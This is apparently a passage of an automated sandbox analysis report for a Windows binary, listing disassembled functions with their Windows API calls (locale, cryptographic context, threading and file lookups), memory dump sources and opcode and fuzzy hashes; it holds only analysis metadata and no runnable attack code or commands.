                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: ContextCryptRelease
                                                              • String ID: ,`_L$MSTTSuser.dll$OleInitializeWOW$wcsstr
                                                              • API String ID: 829835001-987192969
                                                              • Opcode ID: 9fc5af2e2b3fbf965cf0547e1570d710481e5c76869b64eaa0073ad2b132d942
                                                              • Instruction ID: 60919dea1fde7c7290e1bc7affbee0b9452ec838a8e796b5fdac6bda563263ff
                                                              • Opcode Fuzzy Hash: 9fc5af2e2b3fbf965cf0547e1570d710481e5c76869b64eaa0073ad2b132d942
                                                              • Instruction Fuzzy Hash: 9932283480529DCFDB10DF60D881ACDB7BABF49304F5081E6D848B7256D775AA89CFA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040CA28 Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsValidLocale.KERNEL32(?,00000002,00000000,0040CB8D,?,?,?,00000000), ref: 0040CAD2
                                                              • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040CB8D,?,?,?,00000000), ref: 0040CAEE
                                                              • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040CB8D,?,?,?,00000000), ref: 0040CAFF
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: Locale$Info$Valid
                                                              • String ID:
                                                              • API String ID: 1826331170-0
                                                              • Opcode ID: dc98ea9a91aae6d5a0775f99af886e6dd3c62cdf4629cf988b7c1198aebb0fe8
                                                              • Instruction ID: 23c11aa9885e3c916dff53f67515c36f66bc6504bb74cbc91727a7fed7d712bd
                                                              • Opcode Fuzzy Hash: dc98ea9a91aae6d5a0775f99af886e6dd3c62cdf4629cf988b7c1198aebb0fe8
                                                              • Instruction Fuzzy Hash: 2831AD70A00A1CEBEB20DB60DCC2B9B77B5FB44701F5006BAA509B32D1D6396E80CE19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00884967 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125encryptionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CryptReleaseContext.ADVAPI32(00000000,00000000,00884B38,008852E2,?,?,?,?,00000000,00000000,?,00888875,00000000,0088A2A0), ref: 00884A6C
                                                              Strings
                                                              • api-ms-win-core-util-l1-1-0.dll, xrefs: 00884A42
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: ContextCryptRelease
                                                              • String ID: api-ms-win-core-util-l1-1-0.dll
                                                              • API String ID: 829835001-3708114764
                                                              • Opcode ID: e72bdd19fac70373ab68961f9b74b878a17058238effaa2eae420ea01d9a4522
                                                              • Instruction ID: a325787f50939f531d6cfea34497d2f82449af8cb1540bcdc645a1f0ab4add37
                                                              • Opcode Fuzzy Hash: e72bdd19fac70373ab68961f9b74b878a17058238effaa2eae420ea01d9a4522
                                                              • Instruction Fuzzy Hash: 5751E076A15229CFDB04EFA8E981ACDB7F4FB09318F11502AE001FB661D735A945CF25
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004235B0 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,?,00423677,00000000,?,?,?,00899A4F,FDE44ACE,?,?,0089B6AC,?,00000074), ref: 004235CB
                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00423677,00000000,?,?,?,00899A4F,FDE44ACE,?,?,0089B6AC,?), ref: 004235D6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: dc64fdd914615b049f7e817cb6537e09cab8c4ae1589e8d2fe4e5d1ed68ca6f5
                                                              • Instruction ID: 01a03d814939720a58ed36e95a7979cf1404916787e28f7e552fe1288b409e44
                                                              • Opcode Fuzzy Hash: dc64fdd914615b049f7e817cb6537e09cab8c4ae1589e8d2fe4e5d1ed68ca6f5
                                                              • Instruction Fuzzy Hash: 77E0CD7161430C12C71065F91C8A7AB72DC5B44329F440BA7795CD21D2E63D8B90015D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00883F6C Relevance: 2.0, APIs: 1, Instructions: 544encryptionCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CryptDestroyHash.ADVAPI32(?), ref: 00883F70
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: CryptDestroyHash
                                                              • String ID:
                                                              • API String ID: 174375392-0
                                                              • Opcode ID: ab67b30743256aee4ee3b9a1c14ddcbbbea7e189e2c09e5506ec39e4105f8026
                                                              • Instruction ID: 50bff77f3e6df93792148fc9ba00fbee6659cfa749139e383dae911b241110e4
                                                              • Opcode Fuzzy Hash: ab67b30743256aee4ee3b9a1c14ddcbbbea7e189e2c09e5506ec39e4105f8026
                                                              • Instruction Fuzzy Hash: AA5210344052AE8FDB11DF24D880BC9BBB5BF56308F4491E6C488A7752D7B46B89CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040CD40 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • EnterCriticalSection.KERNEL32(008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B,?,?,00000000,00000000,00000000), ref: 0040CD5E
                                                              • LeaveCriticalSection.KERNEL32(008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B,?,?,00000000,00000000), ref: 0040CD82
                                                              • LeaveCriticalSection.KERNEL32(008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B,?,?,00000000,00000000), ref: 0040CD91
                                                              • IsValidLocale.KERNEL32(00000000,00000002,008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B), ref: 0040CDA3
                                                              • EnterCriticalSection.KERNEL32(008ADC14,00000000,00000002,008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B), ref: 0040CE00
                                                              • LeaveCriticalSection.KERNEL32(008ADC14,008ADC14,00000000,00000002,008ADC14,008ADC14,00000000,0040CE44,?,?,?,00000000,?,0040D70C,00000000,0040D76B), ref: 0040CE29
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                              • String ID: en-US,en,
                                                              • API String ID: 975949045-3579323720
                                                              • Opcode ID: 6ae5857e4506fbe12fe28e77ee88e855aae8d1fbab5fe6f337aed850c569c3ae
                                                              • Instruction ID: 1e1d3b9349122117005ea94893b3b9f41c4e8d9279000f1fe72f09228e9374f1
                                                              • Opcode Fuzzy Hash: 6ae5857e4506fbe12fe28e77ee88e855aae8d1fbab5fe6f337aed850c569c3ae
                                                              • Instruction Fuzzy Hash: 48216220704710EBE710B76AC89275E2599EF46718B90453BB001F6BC2C9BC8C41D7AE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405EE4 Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b3fb30baf3b69651b762d8113197e9e4446f399f61267d7f4205265ef8e08ec9
                                                              • Instruction ID: e92eaf3ff3e09107ede235038e047a6ff9cc1d11e47e23f17a09ae4ad2eea443
                                                              • Opcode Fuzzy Hash: b3fb30baf3b69651b762d8113197e9e4446f399f61267d7f4205265ef8e08ec9
                                                              • Instruction Fuzzy Hash: E3C14572710A010BE714AA7D9C8476FB686DBC5325F18823FE215EB3D6EA7CCC558B48
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00408930 Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00408DBC: GetCurrentThreadId.KERNEL32 ref: 00408DBF
                                                              • GetTickCount.KERNEL32 ref: 00408967
                                                              • GetTickCount.KERNEL32 ref: 0040897F
                                                              • GetCurrentThreadId.KERNEL32 ref: 004089AE
                                                              • GetTickCount.KERNEL32 ref: 004089D9
                                                              • GetTickCount.KERNEL32 ref: 00408A10
                                                              • GetTickCount.KERNEL32 ref: 00408A3A
                                                              • GetCurrentThreadId.KERNEL32 ref: 00408AAA
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: CountTick$CurrentThread
                                                              • String ID:
                                                              • API String ID: 3968769311-0
                                                              • Opcode ID: d8f76c9983ab303e4a2a6eb0811938a6070511537a287b3d8342561fb0ddf730
                                                              • Instruction ID: 97f6f4a4bb359f6e06a49a51cc82c85dbc79a7bf2bbc3ca021f0fc766c487bd8
                                                              • Opcode Fuzzy Hash: d8f76c9983ab303e4a2a6eb0811938a6070511537a287b3d8342561fb0ddf730
                                                              • Instruction Fuzzy Hash: 454180706083419ED721AE7CC68432BBBD1AF90354F18893FD4D8977C2EE7888818B5B
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004086A8 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 004086BD
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004086C3
                                                              • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 004086DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: AddressErrorHandleLastModuleProc
                                                              • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                              • API String ID: 4275029093-79381301
                                                              • Opcode ID: df89b094c4fc9ecf5a0342b6ce30508c82d4132e246c04c3c4f41307faea38b2
                                                              • Instruction ID: 15214c6c6b9f0fa70b4615478ddb3ab3236ccbb59b387d90588494102e7edd23
                                                              • Opcode Fuzzy Hash: df89b094c4fc9ecf5a0342b6ce30508c82d4132e246c04c3c4f41307faea38b2
                                                              • Instruction Fuzzy Hash: 5D117274D00208AEDB20EBA5CE45B6EB7B4DB45304F6084BFE854B72C1DB7C9A408F59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00409930 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C,?,?,00410258), ref: 00409969
                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000,00000000,00409B02,00409B1C), ref: 0040996F
                                                              • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?,00000000), ref: 0040998A
                                                              • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,004099EE,?,?), ref: 00409990
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: FileHandleWrite
                                                              • String ID: Error$Runtime error at 00000000
                                                              • API String ID: 3320372497-2970929446
                                                              • Opcode ID: 940674207d66ce2508097593aa5d6adaf40bf27376d7cd72aa1c20ae4ba549f0
                                                              • Instruction ID: 66a8fc6f3927206ba17adebf6fa23ce3f892fd0946112a400a7a9d52c56287d1
                                                              • Opcode Fuzzy Hash: 940674207d66ce2508097593aa5d6adaf40bf27376d7cd72aa1c20ae4ba549f0
                                                              • Instruction Fuzzy Hash: EEF0AFE0640B00B8FA20A3916C17F2B2A58A702B25F54423FB220B9AD3C7BC48C44A69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 006C3048 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID: X*l
                                                              • API String ID: 1473721057-3061925697
                                                              • Opcode ID: e21ce2cafc081b25742dda36fe5fc48425e70b06716ac3f0bdea40936187c092
                                                              • Instruction ID: e2579ad48a9ad2e6a598501fdd0bb7f9e1bcd0190c794d120b178e91e8997215
                                                              • Opcode Fuzzy Hash: e21ce2cafc081b25742dda36fe5fc48425e70b06716ac3f0bdea40936187c092
                                                              • Instruction Fuzzy Hash: 5D01B12270412086DB20BB34C886FB522DBEF05700B60947EB4069F317DB75CE86C7A7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040CC24 Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040CC35
                                                              • SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040CC93
                                                              • SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040CCF0
                                                              • SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040CD23
                                                                • Part of subcall function 0040CBE0: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040CCA1), ref: 0040CBF7
                                                                • Part of subcall function 0040CBE0: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040CCA1), ref: 0040CC14
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: Thread$LanguagesPreferred$Language
                                                              • String ID:
                                                              • API String ID: 2255706666-0
                                                              • Opcode ID: d2c6e7bba8bc72bbbdf077e3e4acd4a6484c427f75bab13a3a274035a5d700a8
                                                              • Instruction ID: b0102d0044ab73f23b321d7d6f6602272ae1975ebb88da2099e514141e5eeb9e
                                                              • Opcode Fuzzy Hash: d2c6e7bba8bc72bbbdf077e3e4acd4a6484c427f75bab13a3a274035a5d700a8
                                                              • Instruction Fuzzy Hash: 4D316F30A0421ADBDB10EFA9D885AAFB7B8FF04314F10467AE515E7391D7789A04CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 006C3874 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VariantCopy.OLEAUT32 ref: 006C389C
                                                                • Part of subcall function 006C3048: VariantClear.OLEAUT32 ref: 006C3057
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.452273015.000000000041A000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 0000000A.00000002.452127840.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.475906775.00000000008B0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              • Associated: 0000000A.00000002.476010495.00000000008B9000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_400000_ADCA.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCopy
                                                              • String ID: X*l
                                                              • API String ID: 274517740-3061925697
                                                              • Opcode ID: f426b7a77b9917056d4fba03141a3df1ecbde20aff7f728fa90f02b563c57196
                                                              • Instruction ID: cd52d73868f541c82f0ecb16cd641db90badaea0d44612472be3bd043e3e0d3f
                                                              • Opcode Fuzzy Hash: f426b7a77b9917056d4fba03141a3df1ecbde20aff7f728fa90f02b563c57196
                                                              • Instruction Fuzzy Hash: 742195307002218ACB60AF29C4C5FB677E7EF49710714C56EE48B8B316EA74CE86C766
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%